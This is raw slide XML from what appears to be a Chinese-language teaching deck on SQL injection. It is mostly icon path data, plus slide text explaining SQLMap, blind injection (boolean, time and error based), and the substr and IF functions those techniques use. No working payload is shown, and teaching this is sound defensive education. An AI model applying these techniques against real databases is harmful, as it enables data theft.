                    <a:pt x="456840" y="401235"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="478574" y="401235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478574" y="413443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456840" y="413443"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="430943" y="401235"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="452677" y="401235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452677" y="413443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430943" y="413443"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="405539" y="401235"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="427273" y="401235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427273" y="413443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405539" y="413443"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="379642" y="401235"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="401447" y="401235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401447" y="413443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379642" y="413443"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="502779" y="358754"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="530158" y="358754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530158" y="370891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502779" y="370891"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="470389" y="358754"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="497627" y="358754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="497627" y="370891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470389" y="370891"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="438423" y="358754"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="465661" y="358754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465661" y="370891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438423" y="370891"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="405892" y="358754"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="433271" y="358754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433271" y="370891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405892" y="370891"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="373503" y="358754"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="400882" y="358754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400882" y="370891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373503" y="370891"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="527476" y="321143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="546670" y="321143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546670" y="333351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527476" y="333351"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="504613" y="321143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="523948" y="321143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523948" y="333351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504613" y="333351"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="482244" y="321143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="501438" y="321143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501438" y="333351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482244" y="333351"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="459381" y="321143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="478575" y="321143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478575" y="333351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459381" y="333351"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="435600" y="321143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="454794" y="321143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454794" y="333351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435600" y="333351"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="412808" y="321143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="432002" y="321143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432002" y="333351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412808" y="333351"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="390368" y="321143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="409562" y="321143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409562" y="333351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390368" y="333351"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="367505" y="321143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="386769" y="321143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386769" y="333351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367505" y="333351"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="436800" y="281626"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="482032" y="281626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482032" y="293763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436800" y="293763"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="382958" y="281626"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="428190" y="281626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428190" y="293763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382958" y="293763"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="165056" y="268783"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="184098" y="268007"/>
                    <a:pt x="194902" y="287016"/>
                    <a:pt x="194902" y="310449"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194902" y="335510"/>
                    <a:pt x="183710" y="353744"/>
                    <a:pt x="164900" y="353433"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146713" y="353045"/>
                    <a:pt x="135909" y="334967"/>
                    <a:pt x="136064" y="311612"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136064" y="288646"/>
                    <a:pt x="146557" y="269559"/>
                    <a:pt x="165056" y="268783"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="65154" y="251984"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="40819" y="253381"/>
                    <a:pt x="26590" y="268985"/>
                    <a:pt x="26590" y="288314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26590" y="304772"/>
                    <a:pt x="37398" y="315097"/>
                    <a:pt x="54347" y="321617"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66865" y="326586"/>
                    <a:pt x="71841" y="330778"/>
                    <a:pt x="71841" y="338075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71841" y="345760"/>
                    <a:pt x="66087" y="350651"/>
                    <a:pt x="55280" y="350495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45328" y="350263"/>
                    <a:pt x="35920" y="346536"/>
                    <a:pt x="29856" y="342888"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25269" y="364003"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="30867" y="367729"/>
                    <a:pt x="42218" y="371455"/>
                    <a:pt x="53880" y="371921"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82803" y="372930"/>
                    <a:pt x="96876" y="356395"/>
                    <a:pt x="96876" y="336367"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96876" y="319521"/>
                    <a:pt x="87779" y="308653"/>
                    <a:pt x="68886" y="301201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55435" y="295844"/>
                    <a:pt x="49604" y="292739"/>
                    <a:pt x="49604" y="285365"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49604" y="279387"/>
                    <a:pt x="54502" y="274031"/>
                    <a:pt x="64688" y="273643"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75028" y="273177"/>
                    <a:pt x="82648" y="276204"/>
                    <a:pt x="87002" y="278378"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="92444" y="256409"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="85991" y="253614"/>
                    <a:pt x="77050" y="251285"/>
                    <a:pt x="65154" y="251984"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="165762" y="246162"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="130386" y="248180"/>
                    <a:pt x="108694" y="276670"/>
                    <a:pt x="108694" y="312845"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108694" y="352203"/>
                    <a:pt x="132796" y="373008"/>
                    <a:pt x="159464" y="375803"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162341" y="376113"/>
                    <a:pt x="165218" y="376734"/>
                    <a:pt x="167939" y="377976"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184500" y="385739"/>
                    <a:pt x="199506" y="391949"/>
                    <a:pt x="217932" y="398160"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="226485" y="375647"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="216144" y="373163"/>
                    <a:pt x="205026" y="370524"/>
                    <a:pt x="195152" y="367341"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195152" y="366565"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="212101" y="359345"/>
                    <a:pt x="225940" y="338618"/>
                    <a:pt x="225940" y="308886"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="225940" y="273099"/>
                    <a:pt x="204015" y="243988"/>
                    <a:pt x="165762" y="246162"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="416406" y="242816"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="455923" y="242816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455923" y="255024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416406" y="255024"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="369480" y="242816"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="408926" y="242816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408926" y="255024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369480" y="255024"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="277488" y="241970"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="245844" y="243755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245844" y="376656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336189" y="379762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336189" y="352980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277488" y="351970"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="361303" y="72971"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="360525" y="72971"/>
                    <a:pt x="359670" y="73049"/>
                    <a:pt x="358892" y="73204"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="358892" y="205174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409663" y="205174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409663" y="217361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358892" y="217361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358892" y="281638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375375" y="281638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375375" y="293749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358892" y="293749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358892" y="358724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368378" y="358724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368378" y="370912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358892" y="370912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358892" y="401265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375609" y="401265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375609" y="413453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358892" y="413453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358892" y="531760"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="359748" y="531838"/>
                    <a:pt x="360525" y="531993"/>
                    <a:pt x="361303" y="531993"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="545259" y="531993"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="554433" y="531993"/>
                    <a:pt x="561975" y="524463"/>
                    <a:pt x="561975" y="515303"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="561975" y="89661"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="561975" y="80424"/>
                    <a:pt x="554433" y="72971"/>
                    <a:pt x="545259" y="72971"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="358892" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="358892" y="50847"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="359748" y="50769"/>
                    <a:pt x="360525" y="50692"/>
                    <a:pt x="361303" y="50692"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="545259" y="50692"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="566717" y="50692"/>
                    <a:pt x="584211" y="68158"/>
                    <a:pt x="584211" y="89661"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="584211" y="515303"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="584211" y="536728"/>
                    <a:pt x="566717" y="554195"/>
                    <a:pt x="545259" y="554195"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="361303" y="554195"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="360525" y="554195"/>
                    <a:pt x="359748" y="554195"/>
                    <a:pt x="358892" y="554117"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="358892" y="606439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="557378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="47819"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="矩形: 圆角 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5533877" y="5277751"/>
            <a:ext cx="5400600" cy="70277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DML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用于对数据库进行查询或更新 </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animBg="1"/>
      <p:bldP spid="39" grpId="0" animBg="1"/>
      <p:bldP spid="4"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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2532843" y="864088"/>
              <a:ext cx="508859" cy="158614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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2053958" y="1402731"/>
              <a:ext cx="1814420"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SQL</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盲注</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35" name="文本框 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100783" y="1453648"/>
            <a:ext cx="10657184" cy="2395544"/>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上面的实验已经证明了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注入的危害性，通过工具</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SQLMap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可以轻松的获取数据库的所有表、列和数据，读者可能也有疑惑，它是如何达到目的的呢？</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有一些</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注入可以将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执行的结果回显，这种情况下，可以直接通过回显的结果来显示想要查询的各类信息。</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但是，实际情况中，具有回显的注入点非常罕见。在这种情况下就需要利用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盲注。</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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028775" y="4048373"/>
            <a:ext cx="10932750" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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盲注是不能通过直接显示的途径来获取数据库数据的方法</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。在盲注中，攻击者根据其返回页面的不同来判断信息（可能是页面内容的不同，也可以是响应时间不同）。一般情况下，盲注可分为三类：</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基于布尔</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盲注、基于时间的</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盲注、基于报错的</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盲注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5202512" y="837929"/>
            <a:ext cx="2453727" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727"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428143" y="837929"/>
              <a:ext cx="2002471"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常用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函数</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244799" y="1672109"/>
            <a:ext cx="10873208" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的用法：取得字符串中指定起始位置和长度的字符串，默认是从起始位置到结束的子串。语法为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>substr( string, start_position, [ length ] )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>substr('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>目标字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>开始位置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>长度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，再如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>substr('This is a test', 6, 2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>将返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 'is'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的用法：如果满足一个条件可以赋一个需要的值。语法：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IF(expr1,expr2,expr3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，其中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>expr1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>是判断条件，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>expr2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>expr3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>是符合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>expr1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的自定义的返回结果，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>expr1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>为真则返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>expr2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，否则返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>expr3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
